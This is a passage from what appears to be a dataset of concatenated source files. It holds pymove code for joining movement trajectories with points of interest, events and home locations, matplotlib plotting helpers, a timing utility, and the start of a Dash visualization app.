gdf_: DataFrame, gdf_rules_: DataFrame, label_geometry: Optional[Text] = GEOMETRY
):
"""
It performs the integration between trajectories and collective
areas, generating a new column that informs if the point of the
trajectory is inserted in a collective area.
Parameters
----------
gdf_ : geopandas.GeoDataFrame
The input trajectory data
gdf_rules_ : geopandas.GeoDataFrame
        The input collective areas data
label_geometry : str, optional
Label referring to the Point of Interest category, by default GEOMETRY
"""
print('Integration between trajectories and collectives areas')
polygons = gdf_rules_[label_geometry].unique()
gdf_[VIOLATING] = False
for p in progress_bar(polygons):
# intersects = gdf_[label_geometry].apply(lambda x: x.intersects(p))
intersects = gdf_[label_geometry].intersects(p)
index = gdf_[intersects].index
gdf_.at[index, VIOLATING] = True
def _reset_and_creates_id_and_lat_lon(
data: DataFrame,
df_pois: DataFrame,
lat_lon_poi: Optional[bool] = True,
reset_index: Optional[bool] = True
) -> Tuple[ndarray, ndarray, ndarray, ndarray]:
"""
Resets the indexes of the dataframes, returns the minimum distance
between the two dataframes, and return their respective variables
(id, tags, latitude and longitude).
Parameters
----------
data : DataFrame
The input trajectory data.
df_pois : DataFrame
The input point of interest data.
lat_lon_poi : bool, optional
        Flag to determine if the latitude and longitude arrays are of size
        equivalent to df_pois, by default True
reset_index : bool, optional
Flag for reset index of the df_pois and data dataframes before the join,
by default True
Returns
-------
distances, ids, tags, lat, lon: arrays with default values for join operation
"""
if reset_index:
print('... Resetting index to operation...')
data.reset_index(drop=True, inplace=True)
df_pois.reset_index(drop=True, inplace=True)
# create numpy array to store new column to DataFrame of movement objects
distances = np.full(
data.shape[0], np.Infinity, dtype=np.float64
)
ids = np.full(data.shape[0], '', dtype='object_')
tags = np.full(data.shape[0], '', dtype='object_')
# creating lat and lon array to operation
if lat_lon_poi:
lat = np.full(df_pois.shape[0], np.Infinity, dtype=np.float64)
lon = np.full(df_pois.shape[0], np.Infinity, dtype=np.float64)
else:
lat = np.full(data.shape[0], np.Infinity, dtype=np.float64)
lon = np.full(data.shape[0], np.Infinity, dtype=np.float64)
return distances, ids, tags, lat, lon
def _reset_set_window__and_creates_event_id_type(
data: DataFrame, df_events: DataFrame, label_date: Text, time_window: int
) -> Tuple[Series, Series, ndarray, ndarray, ndarray]:
"""
Resets the indexes of the dataframes, set time window, and returns
the current distance between the two dataframes, and return their
respective variables (event_id, event_type).
Parameters
----------
data : DataFrame
The input trajectory data.
df_events : DataFrame
The input event point of interest data.
label_date : str
Label of data referring to the datetime.
time_window : int
Number of seconds of the time window.
Returns
-------
window_starts, window_ends, current_distances, event_id, event_type
"""
# get a vector with windows time to each point
data.reset_index(drop=True, inplace=True)
df_events.reset_index(drop=True, inplace=True)
# compute windows time
window_starts = data[label_date] - Timedelta(seconds=time_window)
window_ends = data[label_date] + Timedelta(seconds=time_window)
# create vector to store distances
current_distances = np.full(
data.shape[0], np.Infinity, dtype=np.float64
)
event_type = np.full(data.shape[0], '', dtype='object_')
event_id = np.full(data.shape[0], '', dtype='object_')
return window_starts, window_ends, current_distances, event_id, event_type
def _reset_set_window_and_creates_event_id_type_all(
data: DataFrame, df_events: DataFrame, label_date: Text, time_window: int
) -> Tuple[Series, Series, ndarray, ndarray, ndarray]:
"""
Resets the indexes of the dataframes, set time window, and returns
the current distance between the two dataframes, and return their
respective variables (event_id, event_type).
Parameters
----------
data : DataFrame
The input trajectory data.
df_events : DataFrame
The input event point of interest data.
label_date : str
Label of data referring to the datetime.
    time_window : int
Number of seconds of the time window.
Returns
-------
window_starts, window_ends, current_distances, event_id, event_type
arrays with default values for join operation
"""
# get a vector with windows time to each point
data.reset_index(drop=True, inplace=True)
df_events.reset_index(drop=True, inplace=True)
# compute windows time
window_starts = data[label_date] - Timedelta(seconds=time_window)
window_ends = data[label_date] + Timedelta(seconds=time_window)
# create vector to store distances
current_distances = np.full(
data.shape[0], None, dtype=np.ndarray
)
event_type = np.full(data.shape[0], None, dtype=np.ndarray)
event_id = np.full(data.shape[0], None, dtype=np.ndarray)
return window_starts, window_ends, current_distances, event_id, event_type
def join_with_pois(
data: DataFrame,
df_pois: DataFrame,
label_id: Optional[Text] = TRAJ_ID,
label_poi_name: Optional[Text] = NAME_POI,
    reset_index: Optional[bool] = True
):
"""
Performs the integration between trajectories and points
of interest, generating two new columns referring to the
name and the distance from the point of interest closest
to each point of the trajectory.
Parameters
----------
data : DataFrame
The input trajectory data.
df_pois : DataFrame
The input point of interest data.
label_id : str, optional
Label of df_pois referring to the Point of Interest id, by default TRAJ_ID
label_poi_name : str, optional
Label of df_pois referring to the Point of Interest name, by default NAME_POI
reset_index : bool, optional
Flag for reset index of the df_pois and data dataframes before the join,
by default True
"""
print('Integration with POIs...')
values = _reset_and_creates_id_and_lat_lon(data, df_pois, True, reset_index)
current_distances, ids_POIs, tag_POIs, lat_user, lon_user = values
for idx, row in progress_bar(data.iterrows(), total=len(data)):
# create a vector to each lat
lat_user.fill(row[LATITUDE])
lon_user.fill(row[LONGITUDE])
# computing distances to idx
distances = np.float64(
haversine(
lat_user,
lon_user,
df_pois[LATITUDE].values,
df_pois[LONGITUDE].values,
)
)
# get index to arg_min and min distance
index_min = np.argmin(distances)
current_distances[idx] = np.min(distances)
# setting data for a single object movement
ids_POIs[idx] = df_pois.at[index_min, label_id]
tag_POIs[idx] = df_pois.at[index_min, label_poi_name]
data[ID_POI] = ids_POIs
data[DIST_POI] = current_distances
data[NAME_POI] = tag_POIs
print('Integration with POI was finalized')
def join_with_pois_optimizer(
data,
df_pois: DataFrame,
label_id: Optional[Text] = TRAJ_ID,
label_poi_name: Optional[Text] = NAME_POI,
dist_poi: Optional[List] = None,
    reset_index: Optional[bool] = True
):
"""
Performs the integration between trajectories and points
of interest, generating two new columns referring to the
name and distance from the nearest point of interest,
within the limit of distance determined by the parameter 'dist_poi',
of each point in the trajectory.
Parameters
----------
data : DataFrame
The input trajectory data.
df_pois : DataFrame
The input point of interest data.
label_id : str, optional
Label of df_pois referring to the Point of Interest id, by default TRAJ_ID
label_poi_name : str, optional
Label of df_pois referring to the Point of Interest name, by default NAME_POI
dist_poi : list, optional
List containing the minimum distance limit between each type of
point of interest and each point of the trajectory to classify the
point of interest closest to each point of the trajectory, by default None
reset_index : bool, optional
Flag for reset index of the df_pois and data dataframes before the join,
by default True
"""
print('Integration with POIs optimized...')
if len(df_pois[label_poi_name].unique()) == len(dist_poi):
values = _reset_and_creates_id_and_lat_lon(data, df_pois, False, reset_index)
minimum_distances, ids_POIs, tag_POIs, lat_POI, lon_POI = values
df_pois.rename(
columns={label_id: TRAJ_ID, label_poi_name: NAME_POI},
inplace=True
)
for idx, row in progress_bar(df_pois.iterrows(), total=len(df_pois)):
# update lat and lon of current index
lat_POI.fill(row[LATITUDE])
lon_POI.fill(row[LONGITUDE])
# First iteration is minimum distances
if idx == 0:
minimum_distances = np.float64(
haversine(
lat_POI,
lon_POI,
data[LATITUDE].values,
data[LONGITUDE].values
)
)
ids_POIs.fill(row.id)
tag_POIs.fill(row.type_poi)
else:
# compute dist between a POI and ALL
print(data[LONGITUDE].values)
current_distances = np.float64(
haversine(
lat_POI,
lon_POI,
data[LATITUDE].values,
data[LONGITUDE].values
)
)
compare = current_distances < minimum_distances
                index_True = np.where(compare)[0]
minimum_distances = np.minimum(
current_distances, minimum_distances, dtype=np.float64
)
if index_True.shape[0] > 0:
ids_POIs[index_True] = row.id
tag_POIs[index_True] = row.type_poi
data[ID_POI] = ids_POIs
data[DIST_POI] = minimum_distances
data[NAME_POI] = tag_POIs
print('Integration with POI was finalized')
else:
print('the size of the dist_poi is different from the size of pois')
def join_with_pois_by_category(
data: DataFrame,
df_pois: DataFrame,
label_category: Optional[Text] = TYPE_POI,
label_id: Optional[Text] = TRAJ_ID
):
"""
It performs the integration between trajectories and points
of interest, generating new columns referring to the
category and distance from the nearest point of interest
that has this category at each point of the trajectory.
Parameters
----------
data : DataFrame
The input trajectory data.
df_pois : DataFrame
The input point of interest data.
label_category : str, optional
Label of df_pois referring to the point of interest category, by default TYPE_POI
label_id : str, optional
Label of df_pois referring to the point of interest id, by default TRAJ_ID
"""
print('Integration with POIs...')
# get a vector with windows time to each point
data.reset_index(drop=True, inplace=True)
df_pois.reset_index(drop=True, inplace=True)
# create numpy array to store new column to DataFrame of movement objects
current_distances = np.full(
data.shape[0], np.Infinity, dtype=np.float64
)
ids_POIs = np.full(data.shape[0], np.NAN, dtype='object_')
unique_categories = df_pois[label_category].unique()
size_categories = len(unique_categories)
print('There are %s categories' % size_categories)
for i, c in enumerate(unique_categories, start=1):
# creating lat and lon array to operation
df_category = df_pois[df_pois[label_category] == c]
df_category.reset_index(drop=True, inplace=True)
desc = 'computing dist to {} category ({}/{})'.format(c, i, size_categories)
for idx, row in progress_bar(data.iterrows(), total=len(data), desc=desc):
lat_user = np.full(
df_category.shape[0], row[LATITUDE], dtype=np.float64
)
lon_user = np.full(
df_category.shape[0], row[LONGITUDE], dtype=np.float64
)
# computing distances to
distances = haversine(
lat_user,
lon_user,
df_category[LATITUDE].values,
df_category[LONGITUDE].values,
)
# get index to arg_min and min distance
index_min = np.argmin(distances)
# setting data for a single object movement
current_distances[idx] = np.min(distances)
ids_POIs[idx] = df_category.at[index_min, label_id]
data['id_%s' % c] = ids_POIs
data['dist_%s' % c] = current_distances
print('Integration with POI was finalized')
def join_with_poi_datetime(
data: DataFrame,
df_events: DataFrame,
label_date: Optional[Text] = DATETIME,
time_window: Optional[int] = 900,
label_event_id: Optional[Text] = EVENT_ID,
label_event_type: Optional[Text] = EVENT_TYPE
):
"""
It performs the integration between trajectories and points
of interest, generating new columns referring to the
category of the point of interest, the distance from the
nearest point of interest based on time of each point of
the trajectories.
Parameters
----------
data : DataFrame
The input trajectory data.
df_events : DataFrame
The input events points of interest data.
label_date : str, optional
Label of data referring to the datetime of the input trajectory data,
by default DATETIME
time_window : float, optional
tolerable length of time range for assigning the event's
point of interest to the trajectory point, by default 900
label_event_id : str, optional
Label of df_events referring to the id of the event, by default EVENT_ID
label_event_type : str, optional
Label of df_events referring to the type of the event, by default EVENT_TYPE
"""
print('Integration with Events...')
values = _reset_set_window__and_creates_event_id_type(
data, df_events, label_date, time_window
)
window_starts, window_ends, current_distances, event_id, event_type = values
for idx in progress_bar(data.index):
# filter event by datetime
df_filtered = filters.by_datetime(
df_events, window_starts[idx], window_ends[idx]
)
size_filter = df_filtered.shape[0]
if size_filter > 0:
df_filtered.reset_index(drop=True, inplace=True)
lat_user = np.full(
size_filter, data.at[idx, LATITUDE], dtype=np.float64
)
lon_user = np.full(
size_filter, data.at[idx, LONGITUDE], dtype=np.float64
)
# compute dist to poi filtered
distances = haversine(
lat_user,
lon_user,
df_filtered[LATITUDE].values,
df_filtered[LONGITUDE].values,
)
# get index to arg_min
index_arg_min = np.argmin(distances)
# get min distances
min_distance = np.min(distances)
# store data
current_distances[idx] = min_distance
event_type[idx] = df_filtered.at[index_arg_min, label_event_type]
event_id[idx] = df_filtered.at[index_arg_min, label_event_id]
data[label_event_id] = event_id
data[DIST_EVENT] = current_distances
data[label_event_type] = event_type
print('Integration with event was completed')
def join_with_poi_datetime_optimizer(
data: DataFrame,
df_events: DataFrame,
label_date: Optional[Text] = DATETIME,
time_window: Optional[int] = 900,
label_event_id: Optional[Text] = EVENT_ID,
label_event_type: Optional[Text] = EVENT_TYPE
):
"""
It performs a optimized integration between trajectories and points
of interest of events, generating new columns referring to
the category of the event, the distance from the nearest
event and the time when the event happened at each point of
the trajectories.
Parameters
----------
data : DataFrame
The input trajectory data.
df_events : DataFrame
The input events points of interest data.
label_date : str, optional
Label of data referring to the datetime of the input trajectory data,
by default DATETIME
time_window : float, optional
tolerable length of time range for assigning the event's
point of interest to the trajectory point, by default 900
label_event_id : str, optional
Label of df_events referring to the id of the event, by default EVENT_ID
label_event_type : str, optional
Label of df_events referring to the type of the event, by default EVENT_TYPE
"""
print('Integration with Events...')
values = _reset_set_window__and_creates_event_id_type(
data, df_events, label_date, time_window
)
window_starts, window_ends, current_distances, event_id, event_type = values
minimum_distances = np.full(
data.shape[0], np.Infinity, dtype=np.float64
)
# Rename for access columns of each row directly
df_events.rename(
columns={label_event_id: label_event_id, label_event_type: label_event_type},
inplace=True
)
for idx, row in progress_bar(df_events.iterrows(), total=len(df_events)):
df_filtered = filters.by_datetime(
data, window_starts[idx], window_ends[idx]
)
size_filter = df_filtered.shape[0]
if size_filter > 0:
indexes = df_filtered.index
lat_event = np.full(
df_filtered.shape[0], row[LATITUDE], dtype=np.float64
)
lon_event = np.full(
df_filtered.shape[0], row[LONGITUDE], dtype=np.float64
)
# First iteration is minimum distances
if idx == 0:
minimum_distances[indexes] = haversine(
lat_event,
lon_event,
df_filtered[LATITUDE].values,
df_filtered[LONGITUDE].values,
)
event_id[indexes] = row.event_id
event_type[indexes] = row.event_type
else:
current_distances[indexes] = haversine(
lat_event,
lon_event,
df_filtered[LATITUDE].values,
df_filtered[LONGITUDE].values,
)
compare = current_distances < minimum_distances
                index_True = np.where(compare)[0]
minimum_distances = np.minimum(
current_distances, minimum_distances
)
event_id[index_True] = row.event_id
event_type[index_True] = row.event_type
data[label_event_id] = event_id
data[DIST_EVENT] = minimum_distances
data[label_event_type] = event_type
print('Integration with events was completed')
def join_with_pois_by_dist_and_datetime(
data: DataFrame,
df_pois: DataFrame,
label_date: Optional[Text] = DATETIME,
label_event_id: Optional[Text] = EVENT_ID,
label_event_type: Optional[Text] = EVENT_TYPE,
time_window: Optional[float] = 3600,
radius: Optional[float] = 1000,
):
"""
It performs the integration between trajectories and points of interest,
generating new columns referring to the category of the point of interest,
the distance between the location of the user and location of the poi
based on the distance and on time of each point of the trajectories.
Parameters
----------
data : DataFrame
The input trajectory data.
df_pois : DataFrame
The input events points of interest data.
label_date : str, optional
Label of data referring to the datetime of the input trajectory data,
by default DATETIME
label_event_id : str, optional
Label of df_events referring to the id of the event, by default EVENT_ID
label_event_type : str, optional
Label of df_events referring to the type of the event, by default EVENT_TYPE
time_window : float, optional
tolerable length of time range for assigning the event's
point of interest to the trajectory point, by default 3600
radius: float, optional
maximum radius of pois, by default 1000
"""
print('Integration with Events...')
if label_date not in df_pois:
raise KeyError("POI's DataFrame must contain a %s column" % label_date)
values = _reset_set_window_and_creates_event_id_type_all(
data, df_pois, label_date, time_window
)
window_start, window_end, current_distances, event_id, event_type = values
for idx, row in progress_bar(data.iterrows(), total=data.shape[0]):
# set min and max of coordinates by radius
bbox = filters.get_bbox_by_radius(
(row[LATITUDE], row[LONGITUDE]), radius
)
# filter event by radius
df_filtered = filters.by_bbox(
df_pois, bbox
)
# filter event by datetime
filters.by_datetime(
df_filtered,
start_datetime=window_start[idx],
end_datetime=window_end[idx],
inplace=True
)
# get df_filtered size
size_filter = df_filtered.shape[0]
if size_filter > 0:
# reseting index of data frame
df_filtered.reset_index(drop=True, inplace=True)
# create lat and lon array to operation
lat_user = np.full(
size_filter, row[LATITUDE], dtype=np.float64
)
lon_user = np.full(
size_filter, row[LONGITUDE], dtype=np.float64
)
# calculate of distances between points
distances = haversine(
lat_user,
lon_user,
df_filtered[LATITUDE].to_numpy(),
df_filtered[LONGITUDE].to_numpy()
)
current_distances[idx] = distances
event_type[idx] = df_filtered[label_event_type].to_numpy(dtype=np.ndarray)
event_id[idx] = df_filtered[label_event_id].to_numpy(dtype=np.ndarray)
data[label_event_id] = event_id
data[DIST_EVENT] = current_distances
data[label_event_type] = event_type
print('Integration with event was completed')
def join_with_home_by_id(
data: DataFrame,
df_home: DataFrame,
label_id: Optional[Text] = TRAJ_ID,
label_address: Optional[Text] = ADDRESS,
label_city: Optional[Text] = CITY,
drop_id_without_home: Optional[bool] = False,
):
"""
It performs the integration between trajectories and home points,
generating new columns referring to the distance of the nearest
home point, address and city of each trajectory point.
Parameters
----------
data : DataFrame
The input trajectory data.
df_home : DataFrame
The input home points data.
label_id : str, optional
Label of df_home referring to the home point id, by default TRAJ_ID
label_address : str, optional
Label of df_home referring to the home point address, by default ADDRESS
label_city : str, optional
Label of df_home referring to the point city, by default CITY
drop_id_without_home : bool, optional
        Flag as an option to drop ids that don't have home points, by default False
"""
print('Integration with Home...')
ids_without_home = []
if data.index.name is None:
print('...setting {} as index'.format(label_id))
data.set_index(label_id, inplace=True)
for idx in progress_bar(data.index.unique()):
filter_home = df_home[label_id] == idx
if df_home[filter_home].shape[0] == 0:
print('...id: {} has not HOME'.format(idx))
ids_without_home.append(idx)
else:
home = df_home[filter_home].iloc[0]
lat_user = data.at[idx, LATITUDE].values
lon_user = data.at[idx, LONGITUDE].values
# if user has a single tuple
if not isinstance(lat_user, np.ndarray):
lat_home = home[LATITUDE].values
lon_home = home[LONGITUDE].values
data.at[idx, DIST_HOME] = haversine(
lat_user, lon_user, lat_home, lon_home
)
data.at[idx, HOME] = home[label_address]
data.at[idx, label_city] = home[label_city]
else:
lat_home = np.full(
data.loc[idx].shape[0], home[LATITUDE], dtype=np.float64
)
lon_home = np.full(
data.loc[idx].shape[0], home[LONGITUDE], dtype=np.float64
)
data.at[idx, DIST_HOME] = haversine(
lat_user, lon_user, lat_home, lon_home
)
data.at[idx, HOME] = np.array(home[label_address])
data.at[idx, label_city] = np.array(home[label_city])
data.reset_index(inplace=True)
print('... Resetting index')
if drop_id_without_home:
data.drop(data.loc[data[TRAJ_ID].isin(ids_without_home)].index, inplace=True)
def merge_home_with_poi(
data: DataFrame,
label_dist_poi: Optional[Text] = DIST_POI,
label_name_poi: Optional[Text] = NAME_POI,
label_id_poi: Optional[Text] = ID_POI,
label_home: Optional[Text] = HOME,
label_dist_home: Optional[Text] = DIST_HOME,
drop_columns: Optional[bool] = True,
):
"""
Perform or merge the points of interest and the starting
points assigned as trajectories, considering the starting
points as other points of interest, generating a new
DataFrame.
Parameters
----------
data : DataFrame
The input trajectory data, with join_with_pois and join_with_home_by_id applied.
label_dist_poi : str, optional
Label of data referring to the distance from the nearest point of interest,
by default DIST_POI
label_name_poi : str, optional
Label of data referring to the name from the nearest point of interest,
by default NAME_POI
label_id_poi : str, optional
Label of data referring to the id from the nearest point of interest,
by default ID_POI
label_home : str, optional
Label of df_home referring to the home point, by default HOME
label_dist_home: str, optional
Label of df_home referring to the distance to the home point,
by default DIST_HOME
drop_columns : bool, optional
Flag that controls the deletion of the columns referring to the
id and the distance from the home point, by default True
"""
print('merge home with POI using shortest distance')
idx = data[data[label_dist_home] <= data[label_dist_poi]].index
data.loc[idx, label_name_poi] = label_home
data.loc[idx, label_dist_poi] = data.loc[idx, label_dist_home]
data.loc[idx, label_id_poi] = data.loc[idx, label_home]
if(drop_columns):
data.drop(columns=[label_dist_home, label_home], inplace=True)
```
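A minimal sketch of `join_with_pois`, assuming the default pymove column names ('lat', 'lon', 'id', 'name_poi') and a made-up POI table; the join mutates the trajectory dataframe in place, adding id, name and distance columns for the nearest POI:

```python
from pandas import DataFrame

# Hypothetical import path, based on the file location shown above.
from pymove.utils import integration

moves = DataFrame({
    'lat': [39.9841, 39.9843],
    'lon': [116.3192, 116.3194],
    'id': [1, 1],
})
pois = DataFrame({
    'lat': [39.9840, 40.0000],
    'lon': [116.3190, 116.3300],
    'id': [100, 101],
    'name_poi': ['bank', 'park'],
})

# Adds 'id_poi', 'dist_poi' and 'name_poi' columns to `moves`.
integration.join_with_pois(moves, pois)
```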
#### File: pymove/visualization/matplotlib.py
```python
from typing import TYPE_CHECKING, Any, Callable, List, Optional, Text, Tuple, Union
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
from pandas.core.frame import DataFrame
from pymove.utils.constants import (
DATE,
DAY,
HOUR,
LATITUDE,
LONGITUDE,
PERIOD,
TID,
TRAJ_ID,
)
if TYPE_CHECKING:
from pymove.core.dask import DaskMoveDataFrame
from pymove.core.pandas import PandasMoveDataFrame
def show_object_id_by_date(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
create_features: Optional[bool] = True,
kind: Optional[List] = None,
figsize: Optional[Tuple[float, float]] = (21, 9),
return_fig: Optional[bool] = True,
save_fig: Optional[bool] = True,
name: Optional[Text] = 'shot_points_by_date.png',
) -> Optional[figure]:
"""
Generates four visualizations based on datetime feature:
- Bar chart trajectories by day periods
- Bar chart trajectories day of the week
- Line chart trajectory by date
- Line chart of trajectory by hours of the day.
Parameters
----------
move_data : pymove.core.MoveDataFrameAbstract subclass.
Input trajectory data.
create_features : bool, optional
        Represents whether or not to keep the datetime features created for
        the visualization in the dataframe, by default True.
kind: list, optional
Determines the kinds of each plot, by default None
figsize : tuple, optional
Represents dimensions of figure, by default (21,9).
return_fig : bool, optional
        Represents whether or not to return the generated figure, by default True.
save_fig : bool, optional
Represents whether or not to save the generated picture, by default True.
name : String, optional
Represents name of a file, by default 'shot_points_by_date.png'.
Returns
-------
figure
The generated picture or None
References
----------
https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.pyplot.plot.html
"""
if kind is None:
kind = ['bar', 'bar', 'line', 'line']
fig, ax = plt.subplots(2, 2, figsize=figsize)
move_data.generate_date_features()
move_data.generate_hour_features()
move_data.generate_time_of_day_features()
move_data.generate_day_of_the_week_features()
move_data.groupby([PERIOD])[TRAJ_ID].nunique().plot(
subplots=True, kind=kind[0], rot=0, ax=ax[0][0], fontsize=12
)
move_data.groupby([DAY])[TRAJ_ID].nunique().plot(
subplots=True, kind=kind[1], ax=ax[0][1], rot=0, fontsize=12
)
move_data.groupby([DATE])[TRAJ_ID].nunique().plot(
subplots=True,
kind=kind[2],
grid=True,
ax=ax[1][0],
rot=90,
fontsize=12,
)
move_data.groupby([HOUR])[TRAJ_ID].nunique().plot(
subplots=True, kind=kind[3], grid=True, ax=ax[1][1], fontsize=12
)
if not create_features:
move_data.drop(columns=[DATE, HOUR, PERIOD, DAY], inplace=True)
if save_fig:
plt.savefig(fname=name, fig=fig)
if return_fig:
return fig
def plot_trajectories(
move_data: DataFrame,
markers: Optional[Text] = 'o',
markersize: Optional[float] = 12,
figsize: Optional[Tuple[float, float]] = (10, 10),
return_fig: Optional[bool] = True,
save_fig: Optional[bool] = True,
name: Optional[Text] = 'trajectories.png',
) -> Optional[figure]:
"""
Generate a visualization that show trajectories.
Parameters
----------
move_data: dataframe
Dataframe with trajectories
markers : str, optional
Represents visualization type marker, by default 'o'
markersize : float, optional
Represents visualization size marker, by default 12
figsize : tuple(float, float), optional
Represents dimensions of figure, by default (10, 10)
return_fig : bool, optional
Represents whether or not to return the generated picture, by default True
save_fig : bool, optional
Represents whether or not to save the generated picture, by default True
name : str, optional
Represents name of a file, by default 'trajectories.png'
Returns
-------
figure
The generated picture or None
"""
fig = plt.figure(figsize=figsize)
ids = move_data['id'].unique()
for id_ in ids:
self_id = move_data[move_data['id'] == id_]
plt.plot(
self_id[LONGITUDE],
self_id[LATITUDE],
markers,
markersize=markersize,
)
if save_fig:
fig.savefig(fname=name)
if return_fig:
return fig
def plot_traj_by_id(
move_data: DataFrame,
id_: Union[int, Text],
label: Optional[Text] = TID,
feature: Optional[Text] = None,
value: Optional[Any] = None,
linewidth: Optional[float] = 3,
markersize: Optional[float] = 20,
figsize: Optional[Tuple[float, float]] = (10, 10),
return_fig: Optional[bool] = True,
save_fig: Optional[bool] = True,
name: Optional[Text] = None,
) -> Optional[figure]:
"""
Generate a visualization that shows a trajectory with the specified tid.
Parameters
----------
move_data: dataframe
Dataframe with trajectories
id_ : int, str
Represents the trajectory tid
label : str, optional
Feature with trajectories tids, by default TID
feature : str, optional
Name of the feature to highlight on plot, by default None
value : any, optional
Value of the feature to be highlighted as green marker, by default None
linewidth : float, optional
Represents the width of the plotted line, by default 3
markersize : float, optional
Represents visualization size marker, by default 20
figsize : tuple(float, float), optional
Represents dimensions of figure, by default (10, 10)
return_fig : bool, optional
Represents whether or not to return the generated picture, by default True
save_fig : bool, optional
Represents whether or not to save the generated picture, by default True
name : str, optional
Represents name of a file, by default None
Returns
-------
figure
The generated picture of the trajectory with the specified tid, or None.
Raises
------
KeyError
If the dataframe does not contain the label feature
IndexError
If there is no trajectory with the tid passed
"""
if label not in move_data:
raise KeyError('%s feature not in dataframe' % label)
df_ = move_data[move_data[label] == id_]
if not len(df_):
raise IndexError(f'No trajectory with tid {id_} in dataframe')
fig = plt.figure(figsize=figsize)
if (not feature) or (not value) or (feature not in df_):
plt.plot(df_[LONGITUDE], df_[LATITUDE])
plt.plot(
df_.loc[:, LONGITUDE], df_.loc[:, LATITUDE],
'r.', markersize=markersize / 2
)
else:
filter_ = df_[feature] == value
df_nodes = df_.loc[filter_]
df_points = df_.loc[~filter_]
plt.plot(df_[LONGITUDE], df_[LATITUDE], linewidth=linewidth)
plt.plot(
df_nodes[LONGITUDE], df_nodes[LATITUDE], 'gs', markersize=markersize / 2
)
plt.plot(
df_points[LONGITUDE], df_points[LATITUDE], 'r.', markersize=markersize / 2
)
plt.plot(
df_.iloc[0][LONGITUDE], df_.iloc[0][LATITUDE], 'yo', markersize=markersize
) # start point
plt.plot(
df_.iloc[-1][LONGITUDE], df_.iloc[-1][LATITUDE], 'yX', markersize=markersize
) # end point
if save_fig:
if not name:
name = 'trajectory_%s.png' % id_
fig.savefig(fname=name)
if return_fig:
return fig
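# Example usage (a sketch; 'situation' and 'stop' are hypothetical feature/value names):
# fig = plot_traj_by_id(mdf, '42_1', feature='situation', value='stop', save_fig=False)
# Rows where the feature equals the value would be drawn as green squares over the line.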
def plot_all_features(
move_data: DataFrame,
dtype: Optional[Callable] = float,
figsize: Optional[Tuple[float, float]] = (21, 15),
return_fig: Optional[bool] = True,
save_fig: Optional[bool] = True,
name: Optional[Text] = 'features.png',
) -> Optional[figure]:
"""
Generate a visualization for each columns that type is equal dtype.
Parameters
----------
move_data: dataframe
Dataframe with trajectories
dtype : callable, optional
Represents column type, by default float
figsize : tuple(float, float), optional
Represents dimensions of figure, by default (21, 15)
return_fig : bool, optional
Represents whether or not to return the generated picture, by default True
save_fig : bool, optional
Represents whether or not to save the generated picture, by default True
name : str, optional
Represents name of a file, by default 'features.png'
Returns
-------
figure
The generated picture or None
Raises
------
AttributeError
If there are no columns with the specified type
"""
col_dtype = move_data.select_dtypes(include=[dtype]).columns
tam = col_dtype.size
if not tam:
raise AttributeError('No columns with dtype %s.' % dtype)
fig, ax = plt.subplots(tam, 1, figsize=figsize)
ax_count = 0
for col in col_dtype:
ax[ax_count].set_title(col)
move_data[col].plot(subplots=True, ax=ax[ax_count])
ax_count += 1
if save_fig:
fig.savefig(fname=name)
if return_fig:
return fig
``` |
{
"source": "JoaoCarabetta/salarios-servidores-federais",
"score": 4
} |
#### File: salarios-servidores-federais/src/utils.py
```python
from timeit import default_timer
import os
class Timer(object):
def __init__(self, verbose=False):
self.verbose = verbose
self.timer = default_timer
def __enter__(self):
self.start = self.timer()
return self
def __exit__(self, *args):
end = self.timer()
self.elapsed_secs = end - self.start
self.elapsed = self.elapsed_secs # seconds
if self.verbose:
print('elapsed time: {0:.2f} s'.format(self.elapsed))
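# Example usage (a sketch, not part of the original file):
# with Timer(verbose=True) as t:
#     do_some_work()  # hypothetical function being timed
# print(t.elapsed_secs)  # elapsed wall-clock time in seconds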
``` |
{
"source": "JoaoCarabetta/viz-parallel",
"score": 2
} |
#### File: JoaoCarabetta/viz-parallel/app.py
```python
import dash
import dash_core_components as dcc
import dash_html_components as html
import flask
from dash.dependencies import Input, Output
import yaml
import glob
from collections import defaultdict
# noinspection PyDeprecation
import imp
from components import components
from methods import wrap_infos
# CONFIG APP
server = flask.Flask(__name__)
app = dash.Dash(name='app1', sharing=True, server=server, csrf_protect=False)
# CONSTANTS
options_properties = [yaml.safe_load(open(path, 'r')) for path in glob.glob('plots/*/config.yaml')]
# BUILD OPTIONS FUNCTIONS
options_functions = defaultdict(lambda: dict())
def add_functions(path, keyword, opt):
for base_path in glob.glob(path):
base_name = base_path.split('/')[1]
# noinspection PyDeprecation
opt[base_name][keyword] = imp.load_source('info', base_path).output[keyword]
return opt
options_functions = add_functions('plots/*/infos.py', 'infos', options_functions)
options_functions = add_functions('plots/*/plot.py', 'plot', options_functions)
options_functions = add_functions('plots/*/get_raw_data.py', 'raw_data', options_functions)
# Set the number of columns
columns = 2
# Config needed to do complex callbacks
app.config.supress_callback_exceptions = True
# App Layout
app.layout = html.Div([
# title
html.Div([
html.H1('Estrutura de tramitações',
style={'margin-top': '10',
'margin-bottom': '-5',
'text-align': 'center'})
],
className='row'
),
html.Div([
html.Hr()
], className='ten columns offset-by-one'),
# graph selection
html.Div([
html.Div([
html.P('Selecione o gráfico a ser mostrado:'),
dcc.RadioItems(
id='graph-selector',
options=[{'label': option['full_name'],
'value': option['back_name']}
for option in options_properties],
value=options_properties[0]['back_name'],
labelStyle={'display': 'inline-block'}
)
],
className='twelve columns offset-by-one'
),
]
),
# filters
html.Div(id='menu',
className='ten columns offset-by-one'
),
html.Div([
html.Br()
], className='twelve columns'),
# graphs comparison
html.Div(
id='output-container',
className='twelve columns'
),
]
)
# General Functions
def generate_ids(value, col, func):
return "{value}-{column}-{function}".format(value=value, column=col, function=func)
def get_back_name_properties(back_name):
return [dic for dic in options_properties if dic['back_name'] == back_name][0]
def filter_data(back_name, callback_input):
options = get_back_name_properties(back_name)['variables']
filtered_data = options_functions[back_name]['raw_data']
for variables in options:
filtered_data = components[variables['type']].filter(callback_input=callback_input,
extra_options=variables,
raw_data=filtered_data)
return filtered_data
# Create Menus
@app.callback(Output('menu', 'children'),
[Input('graph-selector', 'value')])
def update_menu(back_name):
menus = []
for opt in options_properties:
if opt['back_name'] == back_name:
for column in range(columns):
container = []
i = 0
for variables in opt['variables']:
menu_header = html.H3(opt['full_name'] + ' ' + str(column + 1))
menu_title = html.P('Selecione um(a) {}'.format(variables['menu_text']))
if i == 0:
container.append(html.Div([html.Br(), html.Hr(), menu_header, menu_title],
